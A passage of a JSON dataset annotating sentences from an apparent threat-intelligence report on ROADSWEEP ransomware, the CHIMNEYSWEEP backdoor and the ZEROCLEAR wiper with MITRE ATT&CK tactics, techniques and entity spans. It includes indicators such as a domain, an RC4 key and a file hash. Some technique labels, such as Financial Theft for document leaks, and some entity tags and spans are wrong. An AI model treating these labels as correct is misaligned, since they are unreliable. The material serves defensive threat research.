Encrypted for Impact" } ], "procedure": "ROADSWEEP ransomware targets Albanian government with political ransom note", "entities": [ { "text": "targeted the Albanian government", "start": 152, "end": 184, "label": "ThreatActor" }, { "text": "ROADSWEEP", "start": 83, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "drops a politically themed ransom note", "start": 99, "end": 137, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s5-7968b0", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "Threat Detail\nIn mid-July 2022, Mandiant identified a new ransomware family dubbed ROADSWEEP which drops a politically themed ransom note suggesting it targeted the Albanian government.", "sentence_text": "The “HomeLand Justice” front posted a video of the ransomware being executed on its website and Telegram channel alongside alleged Albanian government documents and residence permits of ostensible members of the Mujahedeen-e-Khalq/People’s Mojahedin Organization of Iran (MEK, also known as MKO or PMOI), an Iranian opposition organization that was formerly designated as a terrorist group by the U.S. Department of State.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "HomeLand Justice front demonstrates ransomware execution and leaks Albanian government/MEK documents", "entities": [ { "text": "HomeLand Justice", "start": 5, "end": 21, "label": "ThreatActor" }, { "text": " posted a video of the ransomware being executed", "start": 28, "end": 76, "label": "Action" }, { "text": "alongside alleged Albanian government documents", "start": 113, "end": 160, "label": "Action" }, { "text": "residence permits of ostensible members of the Mujahedeen-e-Khalq/People’s Mojahedin Organization of Iran (MEK, also known as MKO or PMOI)", "start": 165, "end": 303, "label": "Action" }, { "text": "Telegram channe", "start": 96, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "Mujahedeen-e-Khalq", "start": 212, "end": 230, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s6-35d615", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "The “HomeLand Justice” front posted a video of the ransomware being executed on its website and Telegram channel alongside alleged Albanian government documents and residence permits of ostensible members of the Mujahedeen-e-Khalq/People’s Mojahedin Organization of Iran (MEK, also known as MKO or PMOI), an Iranian opposition organization that was formerly designated as a terrorist group by the U.S. Department of State.", "sentence_text": "Upon successful execution, this ROADSWEEP sample drops a ransom note including the text “Why should our taxes be spent on the benefit of DURRES terrorists?”", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ROADSWEEP ransomware drops politically motivated ransom note targeting DURRES", "entities": [ { "text": "ROADSWEEP sample", "start": 32, "end": 48, "label": "MalwareTool" }, { "text": "drops a ransom note", "start": 49, "end": 68, "label": "Action" }, { "text": "Why should our taxes be spent on the benefit of DURRES terrorists?", "start": 89, "end": 155, "label": "Infrastructure_Indicator" }, { "text": "DURRES terrorists", "start": 137, "end": 154, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s8-0a4d1a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "(Figure 1).", "sentence_text": "Durrës is a port city and the second most populous city in Albania.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s9-a3c99b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "Durrës is a port city and the second most populous city in Albania.", "sentence_text": "On July 21, 2022, a front named “HomeLand Justice” leveraged the website “homelandjustice.ru” to start publishing ostensible news stories on the ransomware operation against the Albanian government along with a link to a Telegram channel named “HomeLand Justice.”", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Publish content via a website to support a ransomware-related campaign.", "entities": [ { "text": "leveraged the website “homelandjustice.ru” to start publishing ostensible news stories", "start": 51, "end": 137, "label": "Action" }, { "text": "homelandjustice.ru", "start": 74, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "HomeLand Justice", "start": 245, "end": 261, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s10-d365d1", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "On July 21, 2022, a front named “HomeLand Justice” leveraged the website “homelandjustice.ru” to start publishing ostensible news stories on the ransomware operation against the Albanian government along with a link to a Telegram channel named “HomeLand Justice.”", "sentence_text": "The website “homelandjustice[.]ru” and the Telegram channel both use a banner that appears identical to the wallpaper used by ROADSWEEP and contains the same politically themed language as the ransom note above (Figure 2).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "HomelandJustice infrastructure uses consistent branding with ROADSWEEP ransomware theme", "entities": [ { "text": "homelandjustice[.]ru", "start": 13, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "Telegram channel", "start": 43, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "use a banner that appears identical to the wallpaper used by ROADSWEEP", "start": 65, "end": 135, "label": "Action" }, { "text": "contains the same politically themed language", "start": 140, "end": 185, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s11-d48cc2", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "The website “homelandjustice[.]ru” and the Telegram channel both use a banner that appears identical to the wallpaper used by ROADSWEEP and contains the same politically themed language as the ransom note above (Figure 2).", "sentence_text": "The platforms also posted a video of an alleged wiper executed on a host using this banner.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Platforms post video of wiper execution using consistent campaign branding", "entities": [ { "text": "posted a video of an alleged wiper executed", "start": 19, "end": 62, "label": "Action" }, { "text": "wiper executed on a host", "start": 48, "end": 72, "label": "Action" }, { "text": "using this banner.", "start": 73, "end": 91, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s12-11b3ca", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "The platforms also posted a video of an alleged wiper executed on a host using this banner.", "sentence_text": "Manëz is a town in the Durrës County and the location for the World Summit of Free Iran conference which was set to take place on July 23-24.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s13-7d7faf", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "Manëz is a town in the Durrës County and the location for the World Summit of Free Iran conference which was set to take place on July 23-24.", "sentence_text": "Both the homelandjustice.ru website and the Telegram channel posted documents ostensibly belonging to Albanian government organizations along with what appear to be residence permits, marriage certificates, passports, and other personal documents belonging to alleged members of the MEK.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "HomelandJustice platforms leak Albanian government documents and MEK personal records", "entities": [ { "text": "homelandjustice.ru website", "start": 9, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "Telegram channel", "start": 44, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "personal documents belonging to alleged members of the MEK.", "start": 228, "end": 287, "label": "Infrastructure_Indicator" }, { "text": "posted documents ostensibly belonging to Albanian government organizations along with what appear to be residence permits, marriage certificates, passports, and other personal ", "start": 61, "end": 237, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s14-a66542", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "Both the homelandjustice.ru website and the Telegram channel posted documents ostensibly belonging to Albanian government organizations along with what appear to be residence permits, marriage certificates, passports, and other personal documents belonging to alleged members of the MEK.", "sentence_text": "CHIMNEYSWEEP Backdoor Likely Targets Iranian Diaspora and Dissidents CHIMNEYSWEEP and ROADSWEEP share multiple code overlaps, including identical dynamic API resolution code.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "CHIMNEYSWEEP backdoor targets Iranian diaspora/dissidents with code overlap to ROADSWEEP", "entities": [ { "text": "CHIMNEYSWEEP Backdoor", "start": 0, "end": 21, "label": "MalwareTool" }, { "text": "ROADSWEEP", "start": 86, "end": 95, "label": "MalwareTool" }, { "text": "Targets Iranian Diaspora and Dissidents", "start": 29, "end": 68, "label": "ThreatActor" }, { "text": "share multiple code overlaps", "start": 96, "end": 124, "label": "Action" }, { "text": "identical dynamic API resolution code.", "start": 136, "end": 174, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s15-d0ace1", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "CHIMNEYSWEEP Backdoor Likely Targets Iranian Diaspora and Dissidents CHIMNEYSWEEP and ROADSWEEP share multiple code overlaps, including identical dynamic API resolution code.", "sentence_text": "The shared code includes an embedded RC4 key to decrypt Windows API function strings at run time, which are resolved using LoadLibrary and GetProcAddress calls once decrypted.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Use embedded RC4 key for runtime API decryption via LoadLibrary/GetProcAddress", "entities": [ { "text": "embedded RC4 key", "start": 28, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "decrypt Windows API function strings at run time", "start": 48, "end": 96, "label": "Action" }, { "text": "LoadLibrary and GetProcAddress calls", "start": 123, "end": 159, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s16-e113fd", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "The shared code includes an embedded RC4 key to decrypt Windows API function strings at run time, which are resolved using LoadLibrary and GetProcAddress calls once decrypted.", "sentence_text": "Both capabilities also share the same Base64 custom alphabet, one used to encode the decryption key, the other for command and control.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Share custom Base64 alphabet for decryption key and C2 encoding", "entities": [ { "text": "same Base64 custom alphabet", "start": 33, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "encode the decryption key", "start": 74, "end": 99, "label": "Action" }, { "text": "command and control.", "start": 115, "end": 135, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s17-d51c29", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "Both capabilities also share the same Base64 custom alphabet, one used to encode the decryption key, the other for command and control.", "sentence_text": "Both CHIMNEYSWEEP and ROADSWEEP use the RC4 key “8c e4 b1 6b 22 b5 88 94 aa 86 c4 21 e8 75 9d f3” and the custom Base64 alphabet “wxyz0123456789.-JKLMNOPghijklmnopqrstuvQRSTUVWXYZabcdefABCDEFGHI”.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Use identical RC4 key and custom Base64 alphabet across malware families", "entities": [ { "text": "RC4 key “8c e4 b1 6b 22 b5 88 94 aa 86 c4 21 e8 75 9d f3” ", "start": 40, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "Base64 alphabet “wxyz0123456789.-JKLMNOPghijklmnopqrstuvQRSTUVWXYZabcdefABCDEFGHI”", "start": 113, "end": 195, "label": "Infrastructure_Indicator" }, { "text": "CHIMNEYSWEEP", "start": 5, "end": 17, "label": "MalwareTool" }, { "text": "ROADSWEEP", "start": 22, "end": 31, "label": "MalwareTool" } ] }, { "uid": "mitre-96_mitre_report-p1-s18-f5a9c6", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "Both CHIMNEYSWEEP and ROADSWEEP use the RC4 key “8c e4 b1 6b 22 b5 88 94 aa 86 c4 21 e8 75 9d f3” and the custom Base64 alphabet “wxyz0123456789.-JKLMNOPghijklmnopqrstuvQRSTUVWXYZabcdefABCDEFGHI”.", "sentence_text": "CHIMNEYSWEEP is dropped by a self-extracting archive signed with a valid digital certificate alongside either an Excel, Word, or video file which are likely used as benign decoy documents.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Deploy CHIMNEYSWEEP via signed SFX archive with decoy Office/video files", "entities": [ { "text": "CHIMNEYSWEEP", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "dropped by a self-extracting archive", "start": 16, "end": 52, "label": "Action" }, { "text": "valid digital certificate", "start": 67, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "Excel, Word, or video file which are likely used as benign decoy documents.", "start": 113, "end": 188, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s19-e41d9f", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "CHIMNEYSWEEP is dropped by a self-extracting archive signed with a valid digital certificate alongside either an Excel, Word, or video file which are likely used as benign decoy documents.", "sentence_text": "However, these documents do not appear to be automatically opened when CHIMNEYSWEEP is executed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s20-79b3a4", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "However, these documents do not appear to be automatically opened when CHIMNEYSWEEP is executed.", "sentence_text": "We identified iterations of CHIMNEYSWEEP used as early as 2012.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "CHIMNEYSWEEP malware iterations active since 2012", "entities": [ { "text": "CHIMNEYSWEEP", "start": 28, "end": 40, "label": "MalwareTool" }, { "text": "iterations of CHIMNEYSWEEP used as early as 2012.", "start": 14, "end": 63, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s21-763708", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "We identified iterations of CHIMNEYSWEEP used as early as 2012.", "sentence_text": "The ZEROCLEAR payload takes in command line arguments from the operator and results in corruption of the file system using the RawDisk driver.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "ZEROCLEAR payload uses RawDisk driver for filesystem corruption via command line", "entities": [ { "text": "ZEROCLEAR payload", "start": 4, "end": 21, "label": "MalwareTool" }, { "text": "corruption of the file system", "start": 87, "end": 116, "label": "Action" }, { "text": "takes in command line arguments", "start": 22, "end": 53, "label": "Action" }, { "text": "RawDisk driver.", "start": 127, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s22-93a643", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "The ZEROCLEAR payload takes in command line arguments from the operator and results in corruption of the file system using the RawDisk driver.", "sentence_text": "While we are unable to independently prove or disprove whether the ZEROCLEAR sample was used in this or any disruptive operation, the malware has previously been publicly reported to have links to Iran-nexus threat actors deploying it in support of disruptive activity in the Middle East as recently as 2020.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Iran-nexus threat actors deployed ZEROCLEAR in support of disruptive activity.", "entities": [ { "text": "Iran-nexus threat actors", "start": 197, "end": 221, "label": "ThreatActor" }, { "text": "ZEROCLEAR", "start": 67, "end": 76, "label": "MalwareTool" }, { "text": "deploying it in support of disruptive activity", "start": 222, "end": 268, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s23-d139a6", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "While we are unable to independently prove or disprove whether the ZEROCLEAR sample was used in this or any disruptive operation, the malware has previously been publicly reported to have links to Iran-nexus threat actors deploying it in support of disruptive activity in the Middle East as recently as 2020.", "sentence_text": "Albanian media announced that on July 22 that the conference had been postponed due to a “terrorist attack threat.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s24-f9c57c", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "Albanian media announced that on July 22 that the conference had been postponed due to a “terrorist attack threat.”", "sentence_text": "Iranian and pro-Iran information operations have frequently targeted the MEK with antagonistic messaging, including that leveraging fabricated material such as forged documents.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Iranian information operations target MEK with fabricated documents and antagonistic messaging", "entities": [ { "text": "Iranian and pro-Iran information operations", "start": 0, "end": 43, "label": "ThreatActor" }, { "text": "MEK", "start": 73, "end": 76, "label": "ThreatActor" }, { "text": "targeted the MEK with antagonistic messaging", "start": 60, "end": 104, "label": "Action" }, { "text": "leveraging fabricated material", "start": 121, "end": 151, "label": "Action" }, { "text": "forged documents.", "start": 160, "end": 177, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s25-a21c6f", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "Iranian and pro-Iran information operations have frequently targeted the MEK with antagonistic messaging, including that leveraging fabricated material such as forged documents.", "sentence_text": "For example, the pro-Iran campaign Roaming Mayfly has promoted falsified narratives alleging various Western countries’ support for the MEK.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Roaming Mayfly campaign promotes falsified narratives about Western MEK support", "entities": [ { "text": " Roaming Mayfly", "start": 34, "end": 49, "label": "ThreatActor" }, { "text": "pro-Iran campaign", "start": 17, "end": 34, "label": "ThreatActor" }, { "text": "promoted falsified narratives", "start": 54, "end": 83, "label": "Action" }, { "text": "alleging various Western countries’ support for the MEK", "start": 84, "end": 139, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s26-d39226", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "For example, the pro-Iran campaign Roaming Mayfly has promoted falsified narratives alleging various Western countries’ support for the MEK.", "sentence_text": "We have previously reported on the suspected Iran-nexus ZEROCLEAR and DUSTMAN wipers, which have reportedly targeted entities in Bahrain and Saudi Arabia.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Iran-nexus ZEROCLEAR and DUSTMAN wipers target Bahrain and Saudi Arabia entities", "entities": [ { "text": "ZEROCLEAR and DUSTMAN wipers", "start": 56, "end": 84, "label": "MalwareTool" }, { "text": "Iran-nexus", "start": 45, "end": 55, "label": "ThreatActor" }, { "text": "targeted entities in Bahrain and Saudi Arabia", "start": 108, "end": 153, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s27-be197e", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "We have previously reported on the suspected Iran-nexus ZEROCLEAR and DUSTMAN wipers, which have reportedly targeted entities in Bahrain and Saudi Arabia.", "sentence_text": "We are continuing to investigate this cluster and will provide updates as we are able.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s28-3a60ba", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "We are continuing to investigate this cluster and will provide updates as we are able.", "sentence_text": "Outlook and Implications MarkiRAT .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s29-d1d903", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "Outlook and Implications MarkiRAT .", "sentence_text": "Additionally, numerous recent lock-and-leak operations by suspected Iran-nexus personas such as Black Shadow and Moses Staff have involved disruptive activity against primarily Israeli organizations in an attempt to embarrass them.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" }, { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Iran-nexus personas conduct lock-and-leak operations against Israeli organizations", "entities": [ { "text": "Black Shadow", "start": 96, "end": 108, "label": "ThreatActor" }, { "text": "Moses Staff", "start": 113, "end": 124, "label": "ThreatActor" }, { "text": "Iran-nexus personas", "start": 68, "end": 87, "label": "ThreatActor" }, { "text": "lock-and-leak operations", "start": 30, "end": 54, "label": "Action" }, { "text": "disruptive activity against primarily Israeli organizations", "start": 139, "end": 198, "label": "Action" }, { "text": "attempt to embarrass them.", "start": 205, "end": 231, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s30-39adcc", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "Additionally, numerous recent lock-and-leak operations by suspected Iran-nexus personas such as Black Shadow and Moses Staff have involved disruptive activity against primarily Israeli organizations in an attempt to embarrass them.", "sentence_text": "The use of ransomware to conduct a politically motivated disruptive operation against the government websites and citizen services of a NATO member state in the same week an Iranian opposition groups’ conference was set to take place would be a notably brazen operation by Iran-nexus threat actors.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Politically motivated ransomware operation against NATO member government services during opposition conference", "entities": [ { "text": "Iran-nexus threat actors", "start": 273, "end": 297, "label": "ThreatActor" }, { "text": "politically motivated disruptive operation ", "start": 35, "end": 78, "label": "Action" }, { "text": "ransomware to conduct a politically motivated disruptive operation against the government websites and citizen services", "start": 11, "end": 130, "label": "Action" }, { "text": "NATO member state", "start": 136, "end": 153, "label": "Infrastructure_Indicator" }, { "text": "Iranian opposition groups’ conference", "start": 174, "end": 211, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s31-453b11", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "The use of ransomware to conduct a politically motivated disruptive operation against the government websites and citizen services of a NATO member state in the same week an Iranian opposition groups’ conference was set to take place would be a notably brazen operation by Iran-nexus threat actors.", "sentence_text": "As negotiations surrounding the Iran nuclear deal continue to stall, this activity indicates Iran may feel less restraint in conducting cyber network attack operations going forward.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s32-09f424", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "As negotiations surrounding the Iran nuclear deal continue to stall, this activity indicates Iran may feel less restraint in conducting cyber network attack operations going forward.", "sentence_text": "This activity is also a geographic expansion of Iranian disruptive cyber operations, conducted against a NATO member state.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Geographic expansion of Iranian disruptive cyber operations to NATO member state", "entities": [ { "text": "Iranian disruptive cyber operations", "start": 48, "end": 83, "label": "ThreatActor" }, { "text": "geographic expansion", "start": 24, "end": 44, "label": "Action" }, { "text": "NATO member state.", "start": 105, "end": 123, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s33-86e650", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "This activity is also a geographic expansion of Iranian disruptive cyber operations, conducted against a NATO member state.", "sentence_text": "It may indicate an increased tolerance of risk when employing disruptive tools against countries perceived to be working against Iranian interests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s34-90804f", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "It may indicate an increased tolerance of risk when employing disruptive tools against countries perceived to be working against Iranian interests.", "sentence_text": "Technical Annex A:\nROADSWEEP\nRansomware\nROADSWEEP is a newly discovered ransomware tool, which upon execution will enumerate files on the device and encrypts the content in blocks using RC4.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ROADSWEEP ransomware enumerates and encrypts files using RC4 encryption", "entities": [ { "text": "ROADSWEEP", "start": 19, "end": 28, "label": "MalwareTool" }, { "text": "Ransomware", "start": 29, "end": 39, "label": "MalwareTool" }, { "text": "enumerate files on the device", "start": 115, "end": 144, "label": "Action" }, { "text": "encrypts the content in blocks using RC4.", "start": 149, "end": 190, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s35-80e77b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "Technical Annex A:\nROADSWEEP\nRansomware\nROADSWEEP is a newly discovered ransomware tool, which upon execution will enumerate files on the device and encrypts the content in blocks using RC4.", "sentence_text": "During execution, ROADSWEEP will decrypt these encrypted strings and dynamically resolve necessary imports.\nGoXml.exe (MD5: bbe983dba3bf319621b447618548b740)", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "ROADSWEEP decrypts strings and dynamically resolves imports during execution", "entities": [ { "text": "ROADSWEEP", "start": 18, "end": 27, "label": "MalwareTool" }, { "text": "decrypt these encrypted strings", "start": 33, "end": 64, "label": "Action" }, { "text": "dynamically resolve necessary imports", "start": 69, "end": 106, "label": "Action" }, { "text": "GoXml.exe", "start": 108, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "MD5: bbe983dba3bf319621b447618548b740", "start": 119, "end": 156, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s36-b8b2ee", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "During execution, ROADSWEEP will decrypt these encrypted strings and dynamically resolve necessary imports.\nGoXml.exe (MD5: bbe983dba3bf319621b447618548b740)", "sentence_text": "ROADSWEEP disruptive payload Compiled on 2016/04/30 17:08:19 ROADSWEEP requires four command line arguments to execute correctly, otherwise ROADSWEEP will produce a message box and halt execution.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "ROADSWEEP requires four command line arguments for execution, displays message box on failure", "entities": [ { "text": "ROADSWEEP", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "disruptive payload", "start": 10, "end": 28, "label": "MalwareTool" }, { "text": "Compiled on 2016/04/30 17:08:19", "start": 29, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "requires four command line arguments", "start": 71, "end": 107, "label": "Action" }, { "text": "produce a message box and halt execution", "start": 155, "end": 195, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s37-f152aa", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "ROADSWEEP disruptive payload Compiled on 2016/04/30 17:08:19 ROADSWEEP requires four command line arguments to execute correctly, otherwise ROADSWEEP will produce a message box and halt execution.", "sentence_text": "Upon successful execution, ROADSWEEP creates the following global mutex:", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1480", "name": "Execution Guardrails" } ], "procedure": "ROADSWEEP creates global mutex upon successful execution", "entities": [ { "text": "ROADSWEEP", "start": 27, "end": 36, "label": "MalwareTool" }, { "text": "creates the following global mutex", "start": 37, "end": 71, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s38-9ad0f9", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "Upon successful execution, ROADSWEEP creates the following global mutex:", "sentence_text": "abcdefghijklmnoklmnopqrstuvwxyz01234567890abcdefghijklmnopqrstuvwxyz01234567890\nFollowing initialization", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s39-fcaed3", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "abcdefghijklmnoklmnopqrstuvwxyz01234567890abcdefghijklmnopqrstuvwxyz01234567890\nFollowing initialization", "sentence_text": ", ROADSWEEP will begin resolving the necessary APIs using the Windows GetProcAddress API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s40-22cb8b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": ", ROADSWEEP will begin resolving the necessary APIs using the Windows GetProcAddress API.", "sentence_text": "ROADSWEEP contains multiple embedded scripts which are used to either execute additional commands or to remove itself from the victim’s device.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "ROADSWEEP uses embedded scripts for command execution and self-removal", "entities": [ { "text": "ROADSWEEP", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "execute additional commands", "start": 70, "end": 97, "label": "Action" }, { "text": "remove itself from the victim’s device.", "start": 104, "end": 143, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s41-e2fbc6", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "ROADSWEEP contains multiple embedded scripts which are used to either execute additional commands or to remove itself from the victim’s device.", "sentence_text": "These scripts are never written to disk, 